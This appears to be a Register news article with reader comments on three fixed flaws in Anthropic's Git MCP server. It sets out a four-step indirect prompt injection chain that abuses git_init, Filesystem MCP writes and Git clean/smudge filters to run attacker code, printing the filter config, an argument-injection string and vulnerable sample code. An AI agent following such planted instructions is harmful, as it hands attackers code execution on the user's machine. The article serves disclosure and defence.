Anthropic quietly fixed flaws in its Git MCP server that allowed for remote code execution
- Reference: 1768914014
- News link: https://www.theregister.co.uk/2026/01/20/anthropic_prompt_injection_flaws/
- Source link:
The Git MCP server, mcp-server-git, connects AI tools such as Copilot, Claude, and Cursor to Git repositories and the GitHub platform, allowing them to read repositories and code files, and automate workflows, all using natural language interactions.
Agentic AI security startup Cyata found a way to exploit the vulnerabilities - a path validation bypass flaw ([1]CVE-2025-68145), an unrestricted git_init issue ([2]CVE-2025-68143), and an argument injection in git_diff ([3]CVE-2025-68144) - and chain the Git MCP server with the Filesystem MCP server to achieve code execution.
"Agentic systems break in unexpected ways when multiple components interact. Each MCP server might look safe in isolation, but combine two of them, Git and Filesystem in this case, and you get a toxic combination," Cyata security researcher Yarden Porat told The Register , adding that there's no indication that attackers exploited the bugs in the wild.
"As organizations adopt more complex agentic systems with multiple tools and integrations, these combinations will multiply," Porat said.
Cyata reported the three vulnerabilities to Anthropic in June, and the AI company fixed them in December. The flaws affect default deployments of mcp-server-git prior to 2025.12.18 - so make sure you're using the updated version.
The Register reached out to Anthropic for this story, but the company did not respond to our inquiries.
There's no S(ecurity) in MCP
In a Tuesday report shared with The Register ahead of publication, Cyata says the issues stem from the way AI systems connect to external data sources.
In 2024, [8]Anthropic introduced the Model Context Protocol (MCP), an open standard that enables LLMs to interact with these other systems - filesystems, databases, APIs, messaging platforms, and development tools like Git. MCP servers act as the bridge between the model and external sources, providing the AI with access to the data or tools it needs.
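For the unfamiliar, here is a minimal sketch of what an MCP server looks like in code, using the FastMCP helper from the official Python SDK. The tool name and behaviour are illustrative only, not taken from mcp-server-git:

import subprocess

from mcp.server.fastmcp import FastMCP

mcp = FastMCP("demo-git-tools")

@mcp.tool()
def git_status(repo_path: str) -> str:
    """Return short `git status` output for the given repository path."""
    # A real server should validate repo_path against an allow-list -
    # exactly the kind of check CVE-2025-68145 turned out to be missing.
    result = subprocess.run(
        ["git", "-C", repo_path, "status", "--short"],
        capture_output=True, text=True, check=False,
    )
    return result.stdout

if __name__ == "__main__":
    mcp.run()  # serve the tool over stdio to a connected AI client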
As we've [9]seen [10]repeatedly over the [11]past year , LLMs can be [12]manipulated into [13]doing things they're [14]not supposed to do via [15]prompt injection , which happens when attacker-controlled input causes an AI system to follow unintended instructions. It's a problem that's not going away anytime soon - and [16]may never .
There are two types: direct and indirect. Direct prompt injection happens when someone submits malicious input straight to the model, while indirect injection happens when content the AI processes contains hidden commands that it then follows as if the user had entered them.
[17]Contagious Claude Code bug Anthropic ignored promptly spreads to Cowork
[18]Anthropic Claude wants to be your helpful colleague, always looking over your shoulder
[19]Block CISO: We red-teamed our own AI agent to run an infostealer on an employee laptop
[20]Palo Alto Networks security-intel boss calls AI agents 2026's biggest insider threat
This attack abuses the three now-fixed vulnerabilities.
CVE-2025-68145: The --repository flag is supposed to restrict the MCP server to a specific repository path. However, the server didn't validate that repo_path arguments in subsequent tool calls fell within that configured path, allowing an attacker to bypass the security boundary and access any repository on the system.
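To illustrate the class of bug, here is a minimal sketch of the kind of check that was missing, assuming a single configured repository root; the names (ALLOWED_ROOT, validate_repo_path) are illustrative, not Anthropic's code:

from pathlib import Path

# Hypothetical path configured via --repository.
ALLOWED_ROOT = Path("/home/user/projects/my-repo").resolve()

def validate_repo_path(repo_path: str) -> Path:
    candidate = Path(repo_path).resolve()
    # Path.is_relative_to() (Python 3.9+) rejects anything outside the root,
    # including "../" traversal and absolute paths to other repositories.
    if not candidate.is_relative_to(ALLOWED_ROOT):
        raise PermissionError(f"{candidate} is outside the configured repository")
    return candidate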
CVE-2025-68143: The git_init tool accepted arbitrary filesystem paths and created Git repositories without any validation, allowing any writable directory to be turned into a Git repository and made eligible for subsequent git operations through the MCP server. To fix this, Anthropic removed the git_init tool from the server.
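In GitPython terms, the removed tool boiled down to something like the sketch below - a Repo.init() call on whatever path the model passed in. The function body is illustrative, not the server's actual handler:

import git  # GitPython

def git_init(repo_path: str) -> str:
    # No allow-list check on repo_path: any writable directory - the user's
    # home folder, say - becomes a Git repository, and therefore a valid
    # target for later git operations and their clean/smudge filters.
    repo = git.Repo.init(repo_path)
    return f"Initialized empty Git repository in {repo.git_dir}"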
CVE-2025-68144: The git_diff and git_checkout functions passed user-controlled arguments directly to the GitPython library without sanitization. "By injecting '--output=/path/to/file' into the 'target' field, an attacker could overwrite any file with an empty diff," and delete files, Cyata explained in the report.
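Here is a rough sketch of both the vulnerable pattern and one common mitigation (not necessarily Anthropic's exact patch); the repository path and function names are illustrative:

import git  # GitPython

repo = git.Repo("/path/to/allowed/repo")  # hypothetical path

def git_diff_unsafe(target: str) -> str:
    # Vulnerable pattern: a user-controlled value flows straight into `git diff`.
    # Passing target="--output=/home/user/somefile" makes git write the (empty)
    # diff to that path, overwriting whatever was there.
    return repo.git.diff(target)

def git_diff_safer(target: str) -> str:
    # Minimal mitigation: refuse anything git would parse as an option.
    if target.startswith("-"):
        raise ValueError("revision or path must not start with '-'")
    return repo.git.diff(target)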
Attack chain
As Porat explained to us, the attack uses indirect prompt injection: "Your IDE reads something malicious, a README file, a webpage, a GitHub issue, somewhere the attacker has planted instructions," he said.
The vulnerabilities, when combined with the Filesystem MCP server, abuse Git's smudge and clean filters, which execute shell commands defined in repository configuration files, and enable remote code execution.
According to Porat, it's a four-step process. At a high level:
1. Create a Git repository in a writable directory using git_init.
2. Use the Filesystem MCP server to write a bash script - this is the payload that will execute.
3. Use the Filesystem MCP server to write to Git's internal config files (.git/config and .gitattributes), setting up "clean" and "smudge" filters. These are a Git feature that basically means: when certain Git operations happen, trigger this script. (A rough reconstruction of these files follows after the steps.)
The filters look like:
[filter "myfilter"]
clean = sh exploit.sh
smudge = sh exploit.sh
4. When a subsequent git operation fires the clean or smudge filter, the bash script runs - and the attacker has code execution.
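For the filters to actually apply to files, Git also needs a .gitattributes entry pointing at them. Here is a rough Python reconstruction of the files the Filesystem MCP server would be told to write in step three - the repository path is hypothetical, while the filter name and exploit.sh come from the config above:

from pathlib import Path

repo = Path("/tmp/evil-repo")  # hypothetical path created via git_init in step one

# Map every file in the repository to the malicious filter.
(repo / ".gitattributes").write_text("* filter=myfilter\n")

# Append the filter definition: git runs the command on checkout (smudge)
# and when staging or diffing content (clean).
with open(repo / ".git" / "config", "a") as cfg:
    cfg.write('[filter "myfilter"]\n'
              "\tclean = sh exploit.sh\n"
              "\tsmudge = sh exploit.sh\n")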
This attack illustrates how, as more AI agents move into production, security has to keep pace.
"Security teams can't evaluate each MCP server in a vacuum," Porat said. "They need to assess the effective permissions of the entire agentic system, understand what tools can be chained together, and put controls in place. MCPs expand what agents can do, but they also expand the attack surface. Trust shouldn't be assumed, it needs to be verified and controlled." ®
[1] https://github.com/advisories/GHSA-j22h-9j4x-23w5
[2] https://github.com/advisories/GHSA-5cgr-j3jf-jw3v
[3] https://github.com/advisories/GHSA-9xwc-hfwc-8w59
[8] https://www.theregister.com/2025/04/21/mcp_guide/
[9] https://www.theregister.com/2025/08/20/amazon_quietly_fixed_q_developer_flaws/
[10] https://www.theregister.com/2025/09/26/salesforce_agentforce_forceleak_attack/
[11] https://www.theregister.com/2025/08/08/infosec_hounds_spot_prompt_injection/
[12] https://www.theregister.com/2026/01/12/block_ai_agent_goose/
[13] https://www.theregister.com/2026/01/08/openai_chatgpt_prompt_injection/
[14] https://www.theregister.com/2026/01/15/anthropics_claude_bug_cowork/
[15] https://www.theregister.com/2025/10/28/ai_browsers_prompt_injection/
[16] https://www.theregister.com/2025/10/22/openai_defends_atlas_as_prompt/
[17] https://www.theregister.com/2026/01/15/anthropics_claude_bug_cowork/
[18] https://www.theregister.com/2026/01/13/anthropic_previews_claude_cowork_for/
[19] https://www.theregister.com/2026/01/12/block_ai_agent_goose/
[20] https://www.theregister.com/2026/01/04/ai_agents_insider_threats_panw/
Don't worry, it will be called "Problem sideloading" and blessed as industry best practice.
"as more AI agents move into production, security has to keep pace."
I guess somebody will say: Add more AI.
Failing to sanitise user input - this is basic shit, people. Have any of these AI bros heard of secure development or OWASP?
It's not possible to do
Not even in theory, because there is no distinction whatsoever between commands and data, and there cannot be.
An LLM simply cannot have an "execute bit".
All they are doing is adding guardrails to the output, and as everyone knows, guardrails can be vaulted over.
I don't even have to mention how this most likely didn't "fix" anything but just slightly moved the problem to the side, because the article already mentions it.